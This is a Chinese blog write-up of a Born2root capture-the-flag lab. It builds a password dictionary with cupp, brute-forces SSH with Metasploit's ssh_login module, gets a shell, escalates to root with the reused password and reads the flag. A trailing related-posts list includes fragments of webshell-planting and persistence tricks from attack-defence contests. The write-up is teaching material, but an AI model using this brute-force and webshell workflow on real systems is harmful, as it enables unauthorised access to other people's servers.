暮秋初九
暮秋初九

使用metasploit破解ssh密码

**

一、破解前的准备

**
下载密码文件

root@kali:~# git clone https://github.com/jeanphorn/common-password.git

创建字典文件

root@kali:~# cd common-password/
root@kali:~/common-password# ls
cupp.cfg  cupp.py  docs  README.md
root@kali:~/common-password# chmod 777 cupp.
chmod: 无法访问'cupp.': 没有那个文件或目录
root@kali:~/common-password# chmod 777 cupp.py
root@kali:~/common-password# ./cupp.py -i

[+] Insert the informations about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> Name: hadi
> Surname: 
> Nickname: 
> Birthdate (DDMMYYYY): 


> Wife's(husband's) name: 
> Wife's(husband's) nickname: 
> Wife's(husband's) birthdate (DDMMYYYY): 


> Child's name: 
> Child's nickname: 
> Child's birthdate (DDMMYYYY): 


> Pet's name: 
> Company name: 


> Do you want to add some key words about the victim? Y/[N]: n
> Do you want to add special chars at the end of words? Y/[N]: n
> Do you want to add some random numbers at the end of words? Y/[N]y
> Leet mode? (i.e. leet = 1337) Y/[N]: n

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to hadi.txt, counting 372 words.
[+] Now load your pistolero with hadi.txt and shoot! Good luck!

**

二、使用metasploit

**

root@kali:~/common-password# msfconsole     //登陆metasploit控制台
[-] Failed to connect to the database: could not connect to server: Connection refused
	Is the server running on host "localhost" (::1) and accepting
	TCP/IP connections on port 5432?
could not connect to server: Connection refused
	Is the server running on host "localhost" (127.0.0.1) and accepting
	TCP/IP connections on port 5432?

                                                  

Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
EFLAGS: 00010046
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
ds: 0018   es: 0018  ss: 0018
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)


Stack: 90909090990909090990909090
       90909090990909090990909090
       90909090.90909090.90909090
       90909090.90909090.90909090
       90909090.90909090.09090900
       90909090.90909090.09090900
       ..........................
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       ccccccccc.................
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       .................ccccccccc
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       ..........................
       ffffffffffffffffffffffffff
       ffffffff..................
       ffffffffffffffffffffffffff
       ffffffff..................
       ffffffff..................
       ffffffff..................


Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing


Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.12.22-dev                         ]
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post        ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use auxiliary/scanner/ssh/ssh_login  //使用模板  

msf auxiliary(ssh_login) > show options//显示参数   

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(ssh_login) > set rhosts 192.168.1.109//设置主机地址   
rhosts => 192.168.1.109
msf auxiliary(ssh_login) > set username hadi//设置用户名   
username => hadi
msf auxiliary(ssh_login) > set pass_file '/root/common-password/hadi.txt'//设置字典   
pass_file => /root/common-password/hadi.txt
msf auxiliary(ssh_login) > set threads 5//设置线程  
threads => 5
msf auxiliary(ssh_login) > show options//查看  选项是否完成

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting                 Required  Description
   ----              ---------------                 --------  -----------
   BLANK_PASSWORDS   false                           no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                               yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                           no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                           no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                           no        Add all users in the current database to the list
   PASSWORD                                          no        A specific password to authenticate with
   PASS_FILE         /root/common-password/hadi.txt  no        File containing passwords, one per line
   RHOSTS            192.168.1.109                   yes       The target address range or CIDR identifier
   RPORT             22                              yes       The target port
   STOP_ON_SUCCESS   false                           yes       Stop guessing when a credential works for a host
   THREADS           5                               yes       The number of concurrent threads
   USERNAME          hadi                            no        A specific username to authenticate as
   USERPASS_FILE                                     no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                           no        Try the username as the password for all users
   USER_FILE                                         no        File containing usernames, one per line
   VERBOSE           true                            yes       Whether to print output for all attempts

msf auxiliary(ssh_login) > run    //开始爆破 

[*] SSH - Starting bruteforce
[-] SSH - Failed: 'hadi:Hadi10'
[!] No active DB -- Credential data will not be saved!
[-] SSH - Failed: 'hadi:Hadi11'
[-] SSH - Failed: 'hadi:Hadi12'
[-] SSH - Failed: 'hadi:Hadi13'
[-] SSH - Failed: 'hadi:Hadi14'
[-] SSH - Failed: 'hadi:Hadi15'
[-] SSH - Failed: 'hadi:Hadi16'
[-] SSH - Failed: 'hadi:Hadi17'
[-] SSH - Failed: 'hadi:Hadi18'
[-] SSH - Failed: 'hadi:Hadi19'
[-] SSH - Failed: 'hadi:Hadi20'
[-] SSH - Failed: 'hadi:Hadi2008'
[-] SSH - Failed: 'hadi:Hadi2009'
[-] SSH - Failed: 'hadi:Hadi2010'
[-] SSH - Failed: 'hadi:Hadi21'
[-] SSH - Failed: 'hadi:Hadi22'
[-] SSH - Failed: 'hadi:Hadi23'
[-] SSH - Failed: 'hadi:Hadi24'
[-] SSH - Failed: 'hadi:Hadi25'
[-] SSH - Failed: 'hadi:Hadi26'
[-] SSH - Failed: 'hadi:Hadi27'
[-] SSH - Failed: 'hadi:Hadi28'
[-] SSH - Failed: 'hadi:Hadi29'
[-] SSH - Failed: 'hadi:Hadi30'
[-] SSH - Failed: 'hadi:Hadi31'
[-] SSH - Failed: 'hadi:Hadi32'
[-] SSH - Failed: 'hadi:Hadi33'
[-] SSH - Failed: 'hadi:Hadi34'
[-] SSH - Failed: 'hadi:Hadi35'
[-] SSH - Failed: 'hadi:Hadi36'
[-] SSH - Failed: 'hadi:Hadi37'
[-] SSH - Failed: 'hadi:Hadi38'
[-] SSH - Failed: 'hadi:Hadi39'
[-] SSH - Failed: 'hadi:Hadi40'
^C[*] Caught interrupt from the console...
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting                 Required  Description
   ----              ---------------                 --------  -----------
   BLANK_PASSWORDS   false                           no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                               yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                           no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                           no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                           no        Add all users in the current database to the list
   PASSWORD                                          no        A specific password to authenticate with
   PASS_FILE         /root/common-password/hadi.txt  no        File containing passwords, one per line
   RHOSTS            192.168.1.109                   yes       The target address range or CIDR identifier
   RPORT             22                              yes       The target port
   STOP_ON_SUCCESS   false                           yes       Stop guessing when a credential works for a host
   THREADS           5                               yes       The number of concurrent threads
   USERNAME          hadi                            no        A specific username to authenticate as
   USERPASS_FILE                                     no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                           no        Try the username as the password for all users
   USER_FILE                                         no        File containing usernames, one per line
   VERBOSE           true                            yes       Whether to print output for all attempts

root@kali:~/common-password# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
	Is the server running on host "localhost" (::1) and accepting
	TCP/IP connections on port 5432?
could not connect to server: Connection refused
	Is the server running on host "localhost" (127.0.0.1) and accepting
	TCP/IP connections on port 5432?

                                                  

         .                                         .
 .

      dBBBBBBb  dBBBP dBBBBBBP dBBBBBb  .                       o
       '   dB'                     BBP
    dB'dB'dB' dBBP     dBP     dBP BB
   dB'dB'dB' dBP      dBP     dBP  BB
  dB'dB'dB' dBBBBP   dBP     dBBBBBBB

                                   dBBBBBP  dBBBBBb  dBP    dBBBBP dBP dBBBBBBP
          .                  .                  dB' dBP    dB'.BP
                             |       dBP    dBBBB' dBP    dB'.BP dBP    dBP
                           --o--    dBP    dBP    dBP    dB'.BP dBP    dBP
                             |     dBBBBP dBP    dBBBBP dBBBBP dBP    dBP

                                                                    .
                .
        o                  To boldly go where no
                            shell has gone before


Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with
Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.12.22-dev                         ]
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post        ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > show auxiliary/scanner/ssh/ssh_login
[-] Invalid parameter "auxiliary/scanner/ssh/ssh_login", use "show -h" for more information
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show option 
[-] Invalid parameter "option", use "show -h" for more information
msf auxiliary(ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(ssh_login) > set rhosts 192.168.1.109
rhosts => 192.168.1.109
msf auxiliary(ssh_login) > set password hadi123
password => haid123
msf auxiliary(ssh_login) > set username hadi
username => hadi
msf auxiliary(ssh_login) > run

[*] SSH - Starting bruteforce
[-] SSH - Failed: 'hadi:haid123'
[!] No active DB -- Credential data will not be saved!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set password hadi123
password => hadi123
msf auxiliary(ssh_login) > run

[*] SSH - Starting bruteforce
[+] SSH - Success: 'hadi:hadi123' 'uid=1000(hadi) gid=1000(hadi) groupes=1000(hadi),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev) Linux debian 3.16.0-4-586 #1 Debian 3.16.39-1+deb8u2 (2017-03-07) i686 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.1.108:43539 -> 192.168.1.109:22) at 2019-07-07 13:35:32 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > sessions
Actisve sessions
===============

  Id  Type         Information                          Connection
  --  ----         -----------                          ----------
  1   shell linux  SSH hadi:hadi123 (192.168.1.109:22)  192.168.1.108:43539 -> 192.168.1.109:22 (192.168.1.109)

msf auxiliary(ssh_login) > sessions -i 1
[*] Starting interaction with 1...

ls
buff
buff.c
example.c
overflow
peda-session-buff.txt
peda-session-overflow.txt
pwd 
/home/hadi
python -c "import pty;pty.spawn('/bin/bash')"//使用python脚本命令优化行界面       
hadi@debian:~$ su -root
su -root
su : option invalide -- 'r'
Syntaxe : su [options] [IDENTIFIANT]

Options :
  -c, --command COMMANDE        passer la commande COMMANDE à
                                l'interpréteur de commande appelé ;
  -h, --help                    afficher ce message d'aide et quitter ;
  -, -l, --login                utiliser un interpréteur de commandes
                                initial (« login shell ») ;
  -m, -p,
  --preserve-environment        ne pas réinitialiser les variables
                                d'environnement et conserver le même
                                interpréteur de commandes ;
  -s, --shell SHELL             utiliser SHELL comme interpréteur de
                                commandes à la place de celui défini
                                par défaut dans le fichier passwd.

hadi@debian:~$ sudo -root  
sudo -root
bash: sudo : commande introuvable
hadi@debian:~$ su - root
su - root
Mot de passe : hadi123

root@debian:~# pwd
pwd
/root
root@debian:~# ls
ls
flag.txt
root@debian:~# cat flag.txt
cat flag.txt
                                                                      
,-----.                         ,---. ,------.                 ,--.   
|  |) /_  ,---. ,--.--.,--,--, '.-.  \|  .--. ' ,---.  ,---. ,-'  '-. 
|  .-.  \| .-. ||  .--'|      \ .-' .'|  '--'.'| .-. || .-. |'-.  .-' 
|  '--' /' '-' '|  |   |  ||  |/   '-.|  |\  \ ' '-' '' '-' '  |  |   
`------'  `---' `--'   `--''--''-----'`--' '--' `---'  `---'   `--'   


Congratulations ! you  pwned completly Born2root's CTF .

I hope you enjoyed it and you have made Tea's overdose or coffee's overdose :p 

I have blocked some easy ways to complete the CTF ( Kernel Exploit ... ) for give you more fun and more knownledge ...

Pwning the box with a linux binary misconfiguration is more fun than with a Kernel Exploit !

Enumeration is The Key .



Give me feedback :[FB] Hadi Mene
root@debian:~#

破解中用到的命令:

git clone  地址   //下载对应字典

./copy.py  -i  //执行文件

-i 参数,运行完python脚本文件以后打开一个python环境,方便查看运行结果

use auxiliary/scanner/ssh/ssh_login  //ssh暴力破解模块

set  设置选项  show options 显示选项  back返回  exit 退出  run运行

python -c "import pty;pty.spawn('/bin/bash')"

pty模块定义了处理伪终端概念的操作:启动另一个进程并能够以编程方式写入和读取其控制终端。
spawn指pty模块的生成一个进程,并将其控制终端连接至当前进程标准IO;
-c 参数,直接运行python语句。

使用metasploit破解ssh密码_第1张图片

你可能感兴趣的:(awd)

  • 网络攻防WEB入门指南 youhao108 网络攻防web渗透测试网络安全网络攻防
    网络攻防WEB入门指南(大佬绕路)文章目录前言学习网络攻防该如何入门前言我对网络攻防的理解,分为比赛和实战两个部分,两者所学习的知识虽有共通之处,但还是有很大区别,我也在向实战的状态转换,不过二者入门所要掌握的知识差别不大。下面主要从网络攻防竞赛角度,也就是知名的CTF夺旗赛,来谈谈网络攻防知识如何入门。学习网络攻防该如何入门常规CTF比赛主要分为线上做题,以及线下AWD攻防(AttackWith
  • centos7安装docker-compose haidi8 docker容器运维
    1、下载docker-compose网盘下载:链接:https://pan.baidu.com/s/1pltG3aWiN9zMqYt7ZVyLng提取码:7awd--来自百度网盘超级会员V5的分享2、上传docker-compose文件到/usr/local/bin目录[root@192bin]#ll总用量53892-rwxrwxrwx1rootroot5445384710月1617:27dock
  • AWD-Test2 有搞头-CC BUUCTFweb安全安全安全性测试前端sql
    1.已知账号密码,可SSH连接进行代码审计。2.登录可万能密码进入,也可注册后登录。3.修改url参数,发现报错。确定为Linux系统4.写入一句话,并提交。(也可以文件上传,这里采用简洁的方法)//写入这个,在日志log.php可查看flag5.访问log.php日志文件,发现里面有flaghttp://efbc89f9-f04d-4204-b60b-65777640d4ef.node5.buu
  • AWD总结——熟悉环境 weixin_30640291 数据库git操作系统
    1、确定环境是密码登录还是密钥登录密钥登录:(比赛方会提供如下三个文件)将文件导入即可若为密码登录,则看密码是否为随机的哈希值,并推测全场密码是否一样,若一样则首先需要修改密码,避免对方写批量遍历脚本,遍历所有服务器,当可以登录时,就瞬间修改你的机子,然后你就什么都做不了,服务器都落到对方手中,除非重置机子。passwd用户名//linux命令passwdubuntusudopasswdroot/
  • awd总结 访白鹿 python
    总结:由于是第一次参加AWD比赛,各方面经验都不足,在参赛的前几天也是疯狂搜集各种脚本、框架、工具等,同时也参考b站的视频进行学习,我发现就是还是实操才能更快的学习我觉得就是我前期的准备工作不足,也可能是我当时比赛网太卡了,kali一直没有ssh连接上,换了moba连结果半天回应一个连接超时,现下的xshell结果还死活尝试连接不上去,当时就有点慌了,因为比赛已经开始很久了我还没ssh连接上,我就
  • 最常用计算机文件后缀名,文件扩展名/后缀名是什么 常用的文件扩展名大全 乖神队长 最常用计算机文件后缀名
    文件扩展名也称为文件的后缀名,是操作系统用来标记文件类型的一种机制。通常来说,一个扩展名是跟在主文件名后面的,由一个分隔符分隔。下面小编为大家整理了一些常用的文件扩展名。扩展名文件类型打开方式.aiff声音文件WindowsmediaPlayer.!!!Netants暂存文件Netants.ani动画鼠标.arj压缩文件ARJ.avi电影文件WindowsmediaPlayer.awd传真文档.b
  • 2024.2.4 awd总结 木… linux运维服务器
    防御阶段感觉打了几次awd,前面阶段还算比较熟练1.ssh连接靶机登录修改密码[root@8~]#passwdChangingpasswordforuserroot.Newpassword:Retypenewpassword:2.xftp连接备份网站源码我觉得这步还是非常重要的,万一后面被删站。。3.mysql修改密码因为直接连接数据库没连上,所以要找数据库密码在down下来的源码里面找到了php
  • AWD线下赛奇淫技巧 M1r4n CTF网络安全
    AWD线下赛奇淫技巧查看自己,再看看web目录所有者whoamiwlast备份web目录tar-zcvpf/tmp/web.tar.gz/var/www/html/>/dev/null恢复目录tar-zxvpf/tmp/web.tar.gz-C/>/dev/null改权限chmod-R/var/www/html/755批量挂马,优先使用第一个sed-i"1i"*.phpsed-i"1i"*.php
  • CTF——AWD模式小总结 白帽黑客-嘉哥 web安全安全ddos网络安全学习计算机网络安全威胁分析
    本文以bugku平台awd比赛来写awd比赛平台一、防御(比赛开始有30分钟防御时间)比赛开始得到一个靶机,如下信息ssh用户名和密码,还有虚拟ip然后我们ssh连接进行防御,这里我推荐使用Xshell配合Xftp使用,打开xshell新建一个连接,写入相应信息填入用户名还有密码,然后点击连接2.进入之后我们直接点击,xftp按钮(目的:需要连接xftp下载文件)连接成功后如下进入/var/www
  • AWD认识和赛前准备 正在努力中的小白♤ 安全
    AWD介绍AWD:AttackWithDefence,北赛中每个队伍维护多台服务器,服务器中存在多个漏洞,利用漏洞攻击其他队伍可以进行得分,修复漏洞可以避免被其他队伍攻击失分。一般分配Web服务器,服务器(多数为Linux)某处存在flag(一般在根目录下);可能会提供一台流量分析虚拟机,可以下载流量文件进行数据分析;flag在主办方的设定下每隔一定时间刷新一轮;各队一般都有自己的初始分数flag
  • AWD攻防比赛指导手册 渗透测试中心 CTF
    0#什么是AWD0.1#AWD赛制介绍「攻防模式|AWD(AttackWithDefense)」是CTF比赛「CTFCaptureTheFlag」几种主要的比赛模式之一,该模式常见于线下赛。在该模式中,每个队伍都拥有一个相同的初始环境(我们称其为GameBox),该环境通常运行着一些特定的服务或应用程序,而这些服务通常包含一些安全漏洞。参赛队伍需要挖掘利用对方队伍服务中的安全漏洞,获取Flag以获
  • awd骚操作命令学习笔记 BuFFERer
    aliasLinuxalias命令用于设置指令的别名。用户可利用alias,自定指令的别名。若仅输入alias,则可列出目前所有的别名设置。alias的效力仅及于该次登入的操作。若要每次登入是即自动设好别名,可在.profile或.cshrc中设定指令的别名。alias[别名]=[指令名称]1.alias显示当前所有的别名2.alias[别名]显示别名代表的命令3.alias新命令='原命令'4.
  • python爬虫AES魔改案例:某音乐素材下载网 局外人LZ pythonpython爬虫
    声明:该文章为学习使用,严禁用于商业用途和非法用途,违者后果自负,由此产生的一切后果均与作者无关一、找出需要加密的参数js运行atob(‘aHR0cHM6Ly93d3cuYWlnZWkuY29tL3NvdW5kL2NsYXNzLw==’)拿到网址,F12打开调试工具,点击任意导航发送请求,找到gei-common/jsonComp/f/awd/log.json请求分析请求头、参数、响应结果会发现响
  • WP篇 某网杯WEBAWD踩坑 这周末在做梦 wp篇javatomcatintellij-idea
    某网杯事件回顾赛题环境坑木马访问JSP显示空白Ubuntu与Mysql问题框架选择idea事件回顾虽然没有参与本次AWD,但是看到另外一只队伍down下来的文件,我还是忍不住心动了,于是决定复现一番,因为某些原因,详细的wp和复现的环境就不公开了。这篇文章主要介绍一下本次比赛和个人复现中所踩的坑。赛题本次线下AWD共5道题,3道web(easyCMS、authSite、bookshop),2道pw
  • python中的后渗透|也可用于AWD攻防--shell管理 RedTeamWing
    在所有的旋律中,wing对说散就散最专一!wing0x00前言在平时或者线下AWD的时候,有一个shell管理器可以让我们打到事半功倍的效果。前提你要能获得别人shell,不然这个也没什么用了。我这里写好的这个只是一个思路,真正的后渗透工具,远比这个强大。0x01具体思路先看有哪些主机和自己已经连接了加一个多线程管理然后就是给连接的主机编号,哪个主机是哪个ip选择相应的主机编号,进入对方shell
  • X-NUCA2017线下赛赛后总结 Killshadow
    这篇文章主要从防御角度来写,防护好自己的服务器,免受对手拿flag,以及如何绕过AWD模式下主办方的checker。比赛之前都是在做逆向的,学了几天Pwn,Patch方式比较粗暴,希望大佬别见怪,应该有很多疏漏,请指出。Calckali下执行该软件,输入各种计算,构造内存泄漏Calc文件计算部分函数相对应的16进制编码用010直接改申请的内存空间大小关于使用malloc需要注意的地方:A、申请了内
  • 新书速递!《AWD特训营》CTF/AWD竞赛标准参考书+实战指南 爱玩电脑的呆呆 php开发语言
    随着网络安全问题日益凸显,国家对网络安全人才的需求持续增长,其中,网络安全竞赛在国家以及企业的人才培养和选拔中扮演着至关重要的角色。在数字化时代,企业为了应对日益增长的攻击威胁,一般都在大量部署安全产品、安全设备,忙于查看各种安全设备、安全运营中心(SOC)、安全态势感知平台中的告警数据,期望在早期阶段就捕获到攻击者行为并实现以下4个目标:一是最大限度减少攻击者的入侵时间,尽可能让其丧失对目标的访
  • AWD的那些事 战神/calmness 安全测试:web\app\工具信息安全功防
    目录介绍比赛形式与规则比赛网络环境AWD考——内容:加固信息收集漏洞检查加强防护Awd中pwn防护使用python打补丁编写伪程序替换有漏洞的程序使用赋值破坏逻辑结构编写判断语句最基本打补丁攻击团队协作常见的技巧方式总结开始后的时间需要完成的内容:注意事项介绍AWD赛制是一种网络安全竞赛的赛制。AWD赛制由安全竞赛专家及行业专家凭借十多年实战经验,将真实网络安全防护设备设施加入抽象的网络环境中,模
  • 第六周 线下AWD总结 tothemoon_2019
    博客:https://tothemoon2019.github.io/2020/11/06/1/文章目录第六周线下AWD总结1.工具AoiAWD(脚本已编译好)D盾,Seay,Xshell一些批量自动脚本监控本地文件生成ip列表,读取flag批量连接ssh(python2,可用于爆破弱密码)2.注意事项root权限,数据库靶机3.总结第六周线下AWD总结上周跟着工作室的大佬们去沈阳参加了第三届辽宁
  • AWD:赛前准备工作以及深度脚本讲解 薯片薯条 AWD安全服务器web安全
    本文主要介绍了一些网络攻防对抗赛的常用方法,也就是俗称的AWD比赛。一.比赛介绍AWD赛制是按照分组来进行比赛的。每组3-4人,经过不同的分工,从而实现对服务器的维护以及对其他人的服务器进行攻击。每个服务器都会有一个提前放好的有漏洞的网站,需要进行代码审计,然后修补漏洞。举个例子,某些参数一可以参杂系统的cmd命令上来,如果执行成功,就会获取你服务器上某个文件夹下的flag.txt的内容,一旦获取
  • AWD竞赛全流程解析 网络安全大本营 服务器web安全网络安全计算机网络网络攻击模型
    AWD(AttackWithDefense,攻防兼备)是一个非常有意思的模式,你需要在一场比赛里要扮演攻击方和防守方,攻者得分,失守者会被扣分。也就是说,攻击别人的靶机可以获取Flag分数时,别人会被扣分,同时你也要保护自己的主机不被别人得分,以防扣分。这种模式非常激烈,赛前准备要非常充分,手上要有充足的防守方案和EXP攻击脚本,而且参赛越多,积累的经验就越多,获胜的希望就越大。常见形式常见的形式
  • CTF-AWD入门手册 哈喽沃德er 数据库
    引文AWD赛制是一种网络安全竞赛的赛制。AWD赛制由安全竞赛专家及行业专家凭借十多年实战经验,将真实网络安全防护设备设施加入抽象的网络环境中,模拟政府、企业、院校等单位的典型网络结构和配置,开展的一种人人对抗的竞赛方式,考验参赛者攻防兼备的能力。其主要特点为:强调实战性、实时性、对抗性,综合考量竞赛队的渗透能力和防护能力。本文就个人经验来讲一下AWD比赛中需要做的事。站点部署比赛开始时我们会分配到
  • 【网安必读】CTF/AWD实战速胜指南《AWD特训营》 秋说 网络安全web安全CTFAWD网络安全信息安全黑客白帽
    文章目录前言正文这本书好在哪这本书讲了什么文末送书前言【文末送书】今天推荐一本网安领域优质书籍《AWD特训营》,本文将从其内容与优势出发,详细阐发其对于网安从业人员的重要性与益处。正文本书为博主推荐的必读书目之一,适用于以下读者:网络安全爱好者网络安全从业人员企业IT运维人员信息安全及相关专业的大学生随着网络安全问题日益凸显,国家对网络安全人才的需求持续增长,随着知识的指数式增长及政策扶持,安全行
  • 关于awd赛制的学习路程·awd的理论内容 南欢richrich awd学习
    什么是awdAWD(AttackWithDefense,攻防兼备)模式是一个非常有意思的模式,你需要在一场比赛里要扮演攻击方和防守方,攻者得分,失守者会被扣分。也就是说,攻击别人的靶机可以获取Flag分数时,别人会被扣分,同时你也要保护自己的主机不被别人得分,以防扣分。在攻防模式中,参赛队伍分别防守同样配置的虚拟靶机,并在有限的博弈时间内,找到其他战队的薄弱环节进行攻击,同时要对自己的靶机环境进行
  • AWD比赛中的一些防护思路技巧 告白热 CTF总结python
    ##思路1:1、改服务器密码(1)linux:passwd(2)如果是root删除可登录用户:cat/etc/passwd|grepbashuserdel-r用户名(3)mysql:updatemysql.usersetpassword=md5(‘密码’)whereuser=‘root’;进入mysql:5.7之后的版本updateusersetauthentication_string=pass
  • AWD比赛入门攻略总结 渗透测试老鸟-九青 CTFweb安全c#
    这是一本能让你从零开始学习AWD并深入AWD的手册纸上得来终觉浅,绝知此事要躬行。目录纸上得来终觉浅,绝知此事要躬行。0#什么是AWD0.1#AWD赛制介绍0.2#比赛整体流程1#比赛环境2#安全加固环节(Defense)2.0#基本加固流程2.0.1Windows加固流程2.0.2Linux加固流程2.1#基本信息搜集2.1.1明确Linux机器信息2.1.2明确Windows机器信息2.1.3
  • 记一次 AWD 比赛中曲折的 Linux 提权 m0rta1 漏洞复现与原理分析linux运维服务器
    前提背景:今天一场AWD比赛中,遇到一个场景:PHP网站存在SQL注入和文件上传漏洞,MYSQL当前用户为ROOT,文件上传蚁剑连接SHELL是权限很低的用户。我需要想办法进行提权,才能读取到/root目录下的flag。一、sqlmap--os-shell提权看到当前用户是DBA都会想着--os-shell提权拿shell,然后直接读取/root里面的flag。然而我试了半天,一直无法获取shel
  • 从红队视角看AWD攻击 前端开发小司机 web安全网络安全系统安全安全架构计算机网络网络攻击模型ddos
    AWD的权限维持攻防兼备AWD模式是一种综合考核参赛团队攻击、防御技术能力、即时策略的比赛模式。在攻防模式中,参赛队伍分别防守同样配置的虚拟靶机,并在有限的博弈时间内,找到其他战队的薄弱环节进行攻击,同时要对自己的靶机环境进行加固防守。在AWD需要权限维持,但通常情况下,我们使用不死马来维持权限:');//创建shell.phpsleep(0);//间隔时间}?>上传之后,访问该页面,就会不断生成
  • PicoDiagnostics (NVH设备软件)-NVH软件计算原理探究 虹科Pico汽车示波器 振动异响(NVH)汽车汽车维修与诊断汽车维修与保养汽车示波器虹科Pico汽车示波器
    NVH问题探讨PicoDiagnostics(NVH设备软件)对于不同驱动方式的车辆、是否通过OBD口读取转速和速度,后轮差速传动比数值对其频率计算原理也是有影响的。究竟什么时候需要填后轮差速传动比呢?下面做一些探讨:连接OBD诊断口计算速度&频率(FWD)连接OBD诊断口计算速度&频率(AWD&4WD)没有连接OBD诊断口计算的速度&频率(RWD)举个例子:使用OBD连接手动切换到“计算行驶速度
  • ctf-web:关于文件上传漏洞的深入研究 薯片薯条 ctf-webphp
    上次我们研究了关于文件上传的漏洞,这次我们研究的内容属于上节课的补充内容,大约是关于文件上传的绕过与防御.怎么说呢,算是一种锻炼吧.因为下个月有个awd的比赛,因此最近会经常发一些关于web的内容.其实我还是挺慌的,因为以前参加的都是ctf线上赛,而且我做的都是逆向这个方面的,然而这次突然来了个web,搞得我有点懵.web也是最近才开始研究的,所以写的可能不尽人意,希望各位大佬看看就好,不喜勿喷.
  • jquery实现的jsonp掉java后台 知了ing javajsonpjquery
    什么是JSONP? 先说说JSONP是怎么产生的: 其实网上关于JSONP的讲解有很多,但却千篇一律,而且云里雾里,对于很多刚接触的人来讲理解起来有些困难,小可不才,试着用自己的方式来阐释一下这个问题,看看是否有帮助。 1、一个众所周知的问题,Ajax直接请求普通文件存在跨域无权限访问的问题,甭管你是静态页面、动态网页、web服务、WCF,只要是跨域请求,一律不准; 2、
  • Struts2学习笔记 caoyong struts2
    SSH : Spring + Struts2 + Hibernate 三层架构(表示层,业务逻辑层,数据访问层) MVC模式 (Model View Controller) 分层原则:单向依赖,接口耦合 1、Struts2  =  Struts  + Webwork 2、搭建struts2开发环境    a>、到www.apac
  • SpringMVC学习之后台往前台传值方法 满城风雨近重阳 springMVC
    springMVC控制器往前台传值的方法有以下几种: 1.ModelAndView    通过往ModelAndView中存放viewName:目标地址和attribute参数来实现传参:      ModelAndView mv=new ModelAndView();  mv.setViewName="success
  • WebService存在的必要性? 一炮送你回车库 webservice
